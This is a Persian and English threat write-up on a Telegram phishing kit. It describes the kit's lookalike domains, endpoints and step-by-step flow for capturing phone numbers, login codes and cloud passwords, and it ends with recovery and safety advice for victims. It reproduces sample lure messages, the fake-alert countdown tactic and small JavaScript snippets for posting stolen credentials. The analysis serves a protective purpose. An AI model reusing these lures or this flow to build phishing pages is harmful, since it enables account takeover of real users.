مشخصات فنی حمله
زیرساخت فیشینگ
- فریمورک: Django
- دامنههای مشکوک: www[.]mytelegram[.]mn, www[.]support-t[.]me, telegrm[.]mn, mytelegram[.]mn, www[.]telegrm[.]mn, support-t[.]me, spam-t[.]me
- پیششماره پیشفرض: +31 (هلند)
- استفاده از CSRF توکن برای هر نشست
API Endpoints
/ajax/phone_number/
/ajax/send_sms_code/
/ajax/verify_sms_code/
/ajax/verify_password/
مراحل دقیق حمله
درخواست شماره تلفن
- تشخیص خودکار کد کشور
- ارسال درخواست به /ajax/phone_number/
- فعالسازی احراز هویت واقعی تلگرام
صفحه ورودی شماره تلفن
🌐 کشور: [تشخیص خودکار]
📱 شماره تلفن: __________
دریافت و ارسال کد تایید
- دریافت کد واقعی از تلگرام
- ارسال به /ajax/verify_sms_code/
- استفاده از API تلگرام در پشت صحنه
صفحه تایید
کد ارسال شده از تلگرام
ورود کد: __ __ __ __ __ __
درخواست رمز ابری
- نمایش راهنمای ورود رمز ابری
- ارسال به /ajax/verify_password/
- دسترسی به اطلاعات حساس
صفحه ورود رمز ابری
ورود رمز ابری: ********
راهنمایی: [راهنمای کاربر]
فریب نهایی
- نمایش هشدار ورود جدید
- اجبار به تایید "Yes, it's me"
- نمایش تایمر برای ایجاد استرس
صفحه هشدار
⚠️ ورود جدید از Amsterdam, NL
انتقال در ۳۰ ثانیه...
چرا این فیشینگ خطرناک است؟
⚠️ کد تایید از تلگرام اصلی ارسال میشود که باعث میشود قربانی به سایت اعتماد کند!
- استفاده از API واقعی تلگرام
- دریافت کد تایید واقعی
- امکان دسترسی به اطلاعات حساس کاربر
- ایجاد حس فوریت و استرس برای قربانی
پیامهای فیشینگ نمونه
⚠️ هشدار امنیتی جعلی
[Telegram Security]
یک دستگاه جدید از {COUNTRY} به حساب شما وارد شده است.
اگر این شما نیستید، لطفاً هویت خود را تأیید کنید:
https://telegrm[.]mn/login
⚠️ درخواست بررسی جعلی
[Technical Team]
یک گزارش مشکوک برای حساب شما ثبت شده است.
برای بررسی و رفع محدودیت به لینک زیر مراجعه کنید:
https://telegrm[.]mn/login
برخی از کدهای مورد استفاده شده
async function sendCode(phone) {
try {
const response = await fetch('/ajax/send_sms_code/', {
method: 'POST',
body: JSON.stringify({ phone_number: phone })
});
} catch (error) {
console.error(error);
}
}
async function verifyCode(code) {
try {
const response = await fetch('/ajax/verify_sms_code/', {
method: 'POST',
body: JSON.stringify({ authorization_code: code })
});
} catch (error) {
console.error(error);
}
}
async function verifyPassword(password) {
try {
const response = await fetch('/ajax/verify_password/', {
method: 'POST',
body: JSON.stringify({ password: password })
});
} catch (error) {
console.error(error);
}
}
در صورت هک شدن چه کنیم؟
- سریعاً از طریق دستگاه دیگر وارد حساب خود شوید
- تمام نشستهای فعال را خاتمه دهید
- رمز دو مرحلهای را تغییر دهید
- به مخاطبین خود اطلاع دهید
- موضوع را به تیم پشتیبانی تلگرام گزارش کنید: @notoscam
نکات مهم امنیتی
⚠️ همیشه از برنامه رسمی تلگرام استفاده کنید و به لینکهای مشکوک توجه نکنید!
- هرگز کد تایید را در سایتهای دیگر وارد نکنید
- فقط از برنامه رسمی تلگرام استفاده کنید
- به آدرس سایتها دقت کنید (فقط telegram.org معتبر است)
- رمز دو مرحلهای را فعال کنید
- رمز ابری را فقط در برنامه رسمی تلگرام وارد کنید
Technical Details of the Attack
Phishing Infrastructure
- Framework: Django
- Suspicious Domains: www[.]mytelegram[.]mn, www[.]support-t[.]me, telegrm[.]mn, mytelegram[.]mn, www[.]telegrm[.]mn, support-t[.]me, spam-t[.]me
- Default Country Code: +31 (Netherlands)
- CSRF tokens used for each session
API Endpoints
/ajax/phone_number/
/ajax/send_sms_code/
/ajax/verify_sms_code/
/ajax/verify_password/
Attack Steps
Request Phone Number
- Automatic country code detection
- Request sent to /ajax/phone_number/
- Trigger real Telegram authentication
Phone Input Screen
🌐 Country: [Auto-detected]
📱 Phone: __________
Receive and Send Verification Code
- Receive a real verification code from Telegram
- Send to /ajax/verify_sms_code/
- Use Telegram API in the background
Verification Screen
Code received from Telegram
Enter Code: __ __ __ __ __ __
Request Cloud Password
- Display guidance for entering cloud password
- Send to /ajax/verify_password/
- Access sensitive user data
Cloud Password Screen
Enter Cloud Password: ********
Hint: [User guidance]
Final Deception
- Display new login alert
- Force confirmation: "Yes, it's me"
- Show countdown timer to induce stress
Warning Screen
⚠️ New login from Amsterdam, NL
Redirecting in 30 seconds...
Why is this Phishing Dangerous?
⚠️ The verification code is sent from the real Telegram, building trust with the victim!
- Uses the real Telegram API
- Receives a genuine verification code
- Access to sensitive user data
- Creates a sense of urgency and stress
Sample Phishing Messages
⚠️ Fake Security Alert
[Telegram Security]
A new device from {COUNTRY} has logged into your account.
If this wasn’t you, please verify your identity:
https://telegrm[.]mn/login
⚠️ Fake Review Request
[Technical Team]
A suspicious report has been filed for your account.
To review and resolve, visit:
https://telegrm[.]mn/login
Some of the Code Snippets Used
async function sendCode(phone) {
try {
const response = await fetch('/ajax/send_sms_code/', {
method: 'POST',
body: JSON.stringify({ phone_number: phone })
});
} catch (error) {
console.error(error);
}
}
async function verifyCode(code) {
try {
const response = await fetch('/ajax/verify_sms_code/', {
method: 'POST',
body: JSON.stringify({ authorization_code: code })
});
} catch (error) {
console.error(error);
}
}
async function verifyPassword(password) {
try {
const response = await fetch('/ajax/verify_password/', {
method: 'POST',
body: JSON.stringify({ password: password })
});
} catch (error) {
console.error(error);
}
}
What to Do If Hacked?
- Log in from another device immediately
- Terminate all active sessions
- Change your two-factor authentication
- Inform your contacts
- Report the issue to Telegram support: @notoscam
Important Security Tips
⚠️ Always use the official Telegram app and beware of suspicious links!
- Never enter verification codes on other sites
- Only use the official Telegram app
- Double-check website URLs (only telegram.org is legitimate)
- Enable two-factor authentication
- Enter your cloud password only in the official app